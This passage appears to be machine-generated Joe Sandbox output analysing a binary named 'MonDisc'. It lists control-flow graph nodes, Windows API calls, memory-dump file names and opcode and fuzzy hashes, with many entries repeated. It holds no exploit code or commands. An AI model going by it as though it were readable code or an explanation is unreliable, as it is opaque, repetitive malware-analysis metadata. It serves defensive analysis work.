7ff62c984484 GetCurrentProcessId 1817->1821 1822 7ff62c8f544c-7ff62c8f544f 1817->1822 1827 7ff62c8f54b8-7ff62c8f54cd GetShellWindow 1821->1827 1822->1817 1822->1821 1827->1827 1828 7ff62c8f54cf-7ff62c8f55cf GetTopWindow GetMessageExtraInfo call 7ff62c984484 * 2 GetParent call 7ff62c984484 * 3 1827->1828 1850 7ff62c8f55d1-7ff62c8f55e0 1828->1850 1850->1850 1851 7ff62c8f55e2-7ff62c8f55fd call 7ff62c984484 1850->1851 1855 7ff62c8f5603-7ff62c8f561a GetTopWindow 1851->1855 1855->1855 1856 7ff62c8f561c-7ff62c8f75db call 7ff62c984484 call 7ff62c9844fc call 7ff62c9844f4 call 7ff62c984484 * 2 GetLastActivePopup 1855->1856 1873 7ff62c8f75dd-7ff62c8f75eb 1856->1873 1873->1873 1874 7ff62c8f75ed-7ff62c8f75fc 1873->1874 1875 7ff62c8f7619-7ff62c8f762c call 7ff62c984484 1874->1875 1879 7ff62c8f75fe-7ff62c8f7602 1875->1879 1880 7ff62c8f762e-7ff62c8f7630 1875->1880 1879->1875 1879->1880 1881 7ff62c8f7635 1880->1881 1882 7ff62c8f7637-7ff62c8f7645 1881->1882 1882->1882 1883 7ff62c8f7647-7ff62c8f7655 1882->1883 1883->1881 1884 7ff62c8f7657-7ff62c8f76a5 IsIconic call 7ff62c984484 * 2 1883->1884 1892 7ff62c8f76a7-7ff62c8f76b5 1884->1892 1892->1892 1893 7ff62c8f76b7-7ff62c8f76c6 GetMessageExtraInfo 1892->1893 1894 7ff62c8f76e3-7ff62c8f76f9 call 7ff62c984484 1893->1894 1898 7ff62c8f76fb-7ff62c8f77f3 call 7ff62c984484 * 3 1894->1898 1899 7ff62c8f76c8-7ff62c8f76cc 1894->1899 1912 7ff62c8f77f5-7ff62c8f7803 1898->1912 1899->1894 1899->1898 1912->1912 1913 7ff62c8f7805-7ff62c8f7831 GetMessageExtraInfo GetCurrentProcessId GetShellWindow 1912->1913 1914 7ff62c8f7834-7ff62c8f787e call 7ff62c984484 1913->1914 1919 7ff62c8f7880-7ff62c8f7973 call 7ff62c984484 * 2 GetUserDefaultLangID 1914->1919 1929 7ff62c8f7975-7ff62c8f7983 1919->1929 1929->1929 1930 7ff62c8f7985-7ff62c8f7ba4 call 7ff62c984484 * 2 GetShellWindow AnyPopup GetCommandLineW call 7ff62c984484 * 2 GetMessageTime call 7ff62c984484 * 2 1929->1930 1954 7ff62c8f7c3c-7ff62c8f7c48 1930->1954 1955 7ff62c8f7c4e-7ff62c8f7c6a GetSystemDefaultLangID GetMessageExtraInfo GetTickCount 1954->1955 1956 7ff62c8f7ba9-7ff62c8f7bad 1954->1956 1957 7ff62c8f7c6d-7ff62c8f7c84 GetTickCount 1955->1957 1956->1954 1956->1955 1957->1957 1958 7ff62c8f7c86-7ff62c8f7c9a GetCurrentProcessId GetTickCount IsIconic 1957->1958 1959 7ff62c8f7c9c-7ff62c8f7caa 1958->1959 1959->1959 1960 7ff62c8f7cac-7ff62c8f7cf7 GetCommandLineW GetDesktopWindow call 7ff62c984484 IsZoomed 1959->1960 1966 7ff62c8f7cf9-7ff62c8f7d07 1960->1966 1966->1966 1967 7ff62c8f7d09-7ff62c8f7ec9 call 7ff62c984484 * 2 GetLastActivePopup call 7ff62c984484 * 6 1966->1967 2000 7ff62c8f7ecf-7ff62c8f7edd 1967->2000 2000->2000 2001 7ff62c8f7edf-7ff62c8f7fcf GetDoubleClickTime call 7ff62c984484 * 2 2000->2001 2009 7ff62c8f8100-7ff62c8f811b call 7ff62c984484 2001->2009 2010 7ff62c8f8029-7ff62c8f8031 2001->2010 2009->2010 2018 7ff62c8f812e-7ff62c8f81b9 call 7ff62c984484 * 4 2009->2018 2015 7ff62c8f8033-7ff62c8f8041 2010->2015 2015->2015 2017 7ff62c8f8043-7ff62c8f80f4 call 7ff62c984484 IsIconic call 7ff62c984484 * 2 2015->2017 2017->2009 2017->2018 2045 7ff62c8f81b9 2018->2045 2045->2045
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 0000000F.00000002.466744912.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467164335.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467229302.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467242423.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467263954.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467385103.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467397508.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467420435.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467506197.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 07eb7d11d4295bc528075bb4d4565afe5d1d99db761832c83f715944b95826d0
                              • Instruction ID: bddc54d9a925b88dfb70d14a41d7d9557462e42e08ee6024d555c6ac19cfea86
                              • Opcode Fuzzy Hash: 07eb7d11d4295bc528075bb4d4565afe5d1d99db761832c83f715944b95826d0
                              • Instruction Fuzzy Hash: 32427162D1C9474EFF516B34AC262B92AD57F267B0FA4463AD80DD7293EF2CB0458213
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C8F56BC Relevance: 56.7, APIs: 31, Strings: 1, Instructions: 656windowCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 0000000F.00000002.466744912.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467164335.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467229302.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467242423.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467263954.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467385103.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467397508.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467420435.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467506197.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: Window$Popup$CommandCountExtraInfoLineMessageShellTick$CurrentForegroundHandleLengthModuleProcessTextZoomed$ActiveIconicLast
                              • String ID: arg
                              • API String ID: 2041650259-2022414218
                              • Opcode ID: a090476f7653a4f20d9f7cb68fa832dfc61f8030dfde6aa4fefa4dc614a2e054
                              • Instruction ID: 576b1569fccb6fc0b2d11123588c656783922bfd67bbe2e8611d73cf5387dc0f
                              • Opcode Fuzzy Hash: a090476f7653a4f20d9f7cb68fa832dfc61f8030dfde6aa4fefa4dc614a2e054
                              • Instruction Fuzzy Hash: 6432C362E289174AFF146B34AC291B92AD47F257B1F94463AD90EC22D7EF3CF1458243
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C8F82A9 Relevance: 54.8, APIs: 36, Instructions: 850COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 0000000F.00000002.466744912.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467164335.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467229302.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467242423.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467263954.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467385103.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467397508.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467420435.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467506197.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: Parent
                              • String ID:
                              • API String ID: 975332729-0
                              • Opcode ID: 5abf0f698b70b8af441bf28a934e024baafb8f7a8809d033692b1be2efeb7010
                              • Instruction ID: 32ad1f17b85f2d0905f1b810eb765aa32ea88ef0f19ffe0af850b0224aa11550
                              • Opcode Fuzzy Hash: 5abf0f698b70b8af441bf28a934e024baafb8f7a8809d033692b1be2efeb7010
                              • Instruction Fuzzy Hash: C3625CA7E289034AFF446F34AC662B969D47F263B4FA4473AD419D22D7EF2CB1458103
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C8F8202 Relevance: 54.8, APIs: 36, Instructions: 813COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 0000000F.00000002.466744912.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467164335.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467229302.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467242423.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467263954.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467385103.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467397508.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467420435.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467506197.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: CurrentProcess
                              • String ID:
                              • API String ID: 2050909247-0
                              • Opcode ID: d8565618b221d0dbace0c3f3fd3bff6ef2fe4a319c6a6cbf516c01d990431181
                              • Instruction ID: eab47c52af4be9f17a0de86fde66c6969f9aad7bfd076be5387e33f66c717e40
                              • Opcode Fuzzy Hash: d8565618b221d0dbace0c3f3fd3bff6ef2fe4a319c6a6cbf516c01d990431181
                              • Instruction Fuzzy Hash: 3A625FA2D289174EFF456F34AC662B929D47F263B4FA4463AD819D32D7EF2CB0458103
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C8F825C Relevance: 53.4, APIs: 35, Instructions: 856COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 0000000F.00000002.466744912.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467164335.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467229302.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467242423.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467263954.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467385103.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467397508.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467420435.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467506197.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: Window
                              • String ID:
                              • API String ID: 2353593579-0
                              • Opcode ID: 7b475249e44056b32032913138981995d7b1b0ce169ccba9ed2285b008a1ba8d
                              • Instruction ID: 6dcbdcdff8d4f216c09dac04d7a1f590a311eb00f3ec093ac9ad22f8fd447030
                              • Opcode Fuzzy Hash: 7b475249e44056b32032913138981995d7b1b0ce169ccba9ed2285b008a1ba8d
                              • Instruction Fuzzy Hash: 50624D97E289034AFF446F34AC662B969D47F263B4FA4473AD419D22D7EF2CB1458103
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C8F82C7 Relevance: 53.3, APIs: 35, Instructions: 845COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 0000000F.00000002.466744912.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467164335.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467229302.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467242423.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467263954.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467385103.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467397508.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467420435.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467506197.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: Window
                              • String ID:
                              • API String ID: 2353593579-0
                              • Opcode ID: 2c91cb14d26e3cbfeb0a6b6d52593c8416ea1c1e338f76a07c1c61ea44a7b0ab
                              • Instruction ID: cb856b98549ed4dd4c1da389ce0344cee3cd597b9ef042c0815b9eb7b865d8c1
                              • Opcode Fuzzy Hash: 2c91cb14d26e3cbfeb0a6b6d52593c8416ea1c1e338f76a07c1c61ea44a7b0ab
                              • Instruction Fuzzy Hash: 38625DA3E289034AFF446F34AC662B969D47F263B4FA4473AD419D22D7EF2CB1458103
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C8F832A Relevance: 53.3, APIs: 35, Instructions: 831windowtimeCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 0000000F.00000002.466744912.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467164335.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467229302.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467242423.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467263954.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467385103.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467397508.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467420435.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467506197.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: Popup$Window$Message$ActiveCurrentDesktopExtraIconicInfoLastLengthProcessTextTimeZoomed
                              • String ID:
                              • API String ID: 1249249616-0
                              • Opcode ID: 649e96a3040e716dd2e475f25863d26953d14027e2addb84bc51d75de1cabe73
                              • Instruction ID: 7bef7cea88e5bd89c8e1d25cfa540e282b1e8d2b0ae9156683c7e7ba320bd845
                              • Opcode Fuzzy Hash: 649e96a3040e716dd2e475f25863d26953d14027e2addb84bc51d75de1cabe73
                              • Instruction Fuzzy Hash: 59625EA3E289034AFF446F34AC662B969D57F263B4FA4473AD419D22D7EF2CB1458103
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C8F834D Relevance: 51.8, APIs: 34, Instructions: 836windowtimeCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 0000000F.00000002.466744912.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467164335.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467229302.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467242423.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467263954.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467385103.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467397508.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467420435.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467506197.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: PopupWindow$Message$ActiveCurrentDesktopExtraIconicInfoLastLengthProcessTextTimeZoomed
                              • String ID:
                              • API String ID: 4133814404-0
                              • Opcode ID: 7675edd059d30eba094bff5d3b99d3534c4a9bcfa657b59bcbe04e52a15992e7
                              • Instruction ID: 8b68264210559b207cab4b9bb32b1c7e8740c8e11b58d146dd131adef6c26471
                              • Opcode Fuzzy Hash: 7675edd059d30eba094bff5d3b99d3534c4a9bcfa657b59bcbe04e52a15992e7
                              • Instruction Fuzzy Hash: D2625DA7E289034AFF446F34AC662B969D47F263B4FA4473AD419D22D7EF2CB1458103
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C8F81BD Relevance: 48.6, APIs: 32, Instructions: 585COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 0000000F.00000002.466744912.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467164335.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467229302.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467242423.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467263954.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467385103.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467397508.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467420435.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467506197.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 19466474feee5869fef1398aee390ee7b46f57e004e48e6c13e1203a141ea1ad
                              • Instruction ID: c3dd9cdd65f58efd872d6328274130541b24cd4587b1b7cca7c9878c0e166398
                              • Opcode Fuzzy Hash: 19466474feee5869fef1398aee390ee7b46f57e004e48e6c13e1203a141ea1ad
                              • Instruction Fuzzy Hash: 17325292D1CA178EFF516B309C262B926957F273B0FA48636D84DD7297EF2CB0858113
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF6290C466B Relevance: 46.5, Strings: 30, Instructions: 8971COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 0000000F.00000003.456540596.00007FF6290C0000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007FF6290C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_3_7ff6290c0000_MonDisc.jbxd
                              Similarity
                              • API ID:
                              • String ID: $(?}|$?$@-}|$@-}|$N$P$Q$R$S$V$^$`$c$d$e$f$g$h$i$k$l$m$o$p$p,}|$p,}|$p,}|$&}|$&}|
                              • API String ID: 0-2371175363
                              • Opcode ID: 28e2ecd05f6a981cb70f20ca57dc87416b017f9c0c4071573e72cc46f1fc6239
                              • Instruction ID: e31cfa4ef45b5ef5b5ef1f6db5e7c28a765b915ab5fc5a49dd6f5b876119d26b
                              • Opcode Fuzzy Hash: 28e2ecd05f6a981cb70f20ca57dc87416b017f9c0c4071573e72cc46f1fc6239
                              • Instruction Fuzzy Hash: 9D04A870814F0F8ADB55DF2888486A4B3A0FF59320F6543B8C86E9B5D6DF34A5C2D792
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C8F63BA Relevance: 36.3, APIs: 24, Instructions: 291timeCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 6382 7ff62c8f63ba-7ff62c8f63ca GetDesktopWindow 6383 7ff62c8f63cc-7ff62c8f63e0 call 7ff62c984484 6382->6383 6386 7ff62c8f63e2-7ff62c8f63e8 6383->6386 6387 7ff62c8f63eb-7ff62c8f63ee 6383->6387 6386->6387 6388 7ff62c8f63f5-7ff62c8f6406 call 7ff62c984484 6387->6388 6389 7ff62c8f63f0-7ff62c8f63f3 6387->6389 6392 7ff62c8f6411-7ff62c8f647c GetDoubleClickTime 6388->6392 6393 7ff62c8f6408-7ff62c8f640e 6388->6393 6389->6383 6389->6388 6397 7ff62c8f647e-7ff62c8f6493 GetSystemDefaultLangID 6392->6397 6393->6392 6397->6397 6398 7ff62c8f6495-7ff62c8f64bb call 7ff62c984af0 GetDoubleClickTime call 7ff62c984484 6397->6398 6403 7ff62c8f64bd-7ff62c8f64c3 6398->6403 6404 7ff62c8f64c6-7ff62c8f64d3 call 7ff62c984484 6398->6404 6403->6404 6408 7ff62c8f64d5-7ff62c8f64db 6404->6408 6409 7ff62c8f64de-7ff62c8f6517 GetDoubleClickTime call 7ff62c984484 6404->6409 6408->6409 6413 7ff62c8f6522-7ff62c8f6525 6409->6413 6414 7ff62c8f6519-7ff62c8f651f 6409->6414 6415 7ff62c8f6594-7ff62c8f65c4 call 7ff62c984484 6413->6415 6416 7ff62c8f6527-7ff62c8f652f call 7ff62c984484 6413->6416 6414->6413 6424 7ff62c8f65cf-7ff62c8f65ef GetDoubleClickTime GetDesktopWindow GetWindowTextLengthW 6415->6424 6425 7ff62c8f65c6-7ff62c8f65cc 6415->6425 6422 7ff62c8f6531-7ff62c8f6537 6416->6422 6423 7ff62c8f653a-7ff62c8f653d 6416->6423 6422->6423 6426 7ff62c8f6552-7ff62c8f655a call 7ff62c984484 6423->6426 6427 7ff62c8f653f 6423->6427 6432 7ff62c8f65f1-7ff62c8f6600 6424->6432 6425->6424 6433 7ff62c8f6565-7ff62c8f657b call 7ff62c984484 6426->6433 6434 7ff62c8f655c-7ff62c8f6562 6426->6434 6429 7ff62c8f6541-7ff62c8f6550 6427->6429 6429->6426 6429->6429 6432->6432 6435 7ff62c8f6602-7ff62c8f6608 GetDoubleClickTime 6432->6435 6441 7ff62c8f657d-7ff62c8f6583 6433->6441 6442 7ff62c8f6586-7ff62c8f658e 6433->6442 6434->6433 6436 7ff62c8f660a-7ff62c8f6627 6435->6436 6436->6436 6438 7ff62c8f6629-7ff62c8f6639 GetWindowTextLengthW call 7ff62c984484 6436->6438 6444 7ff62c8f6644-7ff62c8f6658 call 7ff62c984484 6438->6444 6445 7ff62c8f663b-7ff62c8f6641 6438->6445 6441->6442 6442->6415 6449 7ff62c8f6663-7ff62c8f66f4 GetCommandLineW GetForegroundWindow GetTopWindow call 7ff62c8fd980 call 7ff62c984af0 call 7ff62c8fe0a0 GetLargePageMinimum GetForegroundWindow call 7ff62c984484 6444->6449 6450 7ff62c8f665a-7ff62c8f6660 6444->6450 6445->6444 6459 7ff62c8f66f9-7ff62c8f66fc 6449->6459 6450->6449 6460 7ff62c8f66fe-7ff62c8f6704 6459->6460 6461 7ff62c8f6707-7ff62c8f670d 6459->6461 6460->6461 6462 7ff62c8f6713 6461->6462 6463 7ff62c8f67f0-7ff62c8f688c GetTickCount call 7ff62c984484 6461->6463 6464 7ff62c8f671b-7ff62c8f671e 6462->6464 6471 7ff62c8f688e-7ff62c8f6894 6463->6471 6472 7ff62c8f6897-7ff62c8f68e9 GetWindowTextLengthW IsIconic GetCommandLineW GetDoubleClickTime GetUserDefaultLangID GetDesktopWindow GetParent call 7ff62c984484 6463->6472 6464->6463 6466 7ff62c8f6724-7ff62c8f672c call 7ff62c984484 6464->6466 6473 7ff62c8f672e-7ff62c8f6734 6466->6473 6474 7ff62c8f6737-7ff62c8f6757 GetForegroundWindow call 7ff62c984484 6466->6474 6471->6472 6480 7ff62c8f68f4-7ff62c8f6912 call 7ff62c984484 6472->6480 6481 7ff62c8f68eb-7ff62c8f68f1 6472->6481 6473->6474 6483 7ff62c8f6762-7ff62c8f67dc call 7ff62c984484 6474->6483 6484 7ff62c8f6759-7ff62c8f675f 6474->6484 6491 7ff62c8f6914-7ff62c8f691a 6480->6491 6492 7ff62c8f691d-7ff62c8f6989 6480->6492 6481->6480 6493 7ff62c8f67de-7ff62c8f67e4 6483->6493 6494 7ff62c8f67e7-7ff62c8f67ea 6483->6494 6484->6483 6491->6492 6496 7ff62c8f6990-7ff62c8f69b2 6492->6496 6493->6494 6494->6463 6494->6464 6496->6496 6497 7ff62c8f69b4-7ff62c8f69d7 6496->6497
                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 0000000F.00000002.466744912.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467164335.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467229302.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467242423.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467263954.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467385103.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467397508.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467420435.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467506197.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: ClickDoubleTime$DefaultDesktopLangSystemWindow
                              • String ID:
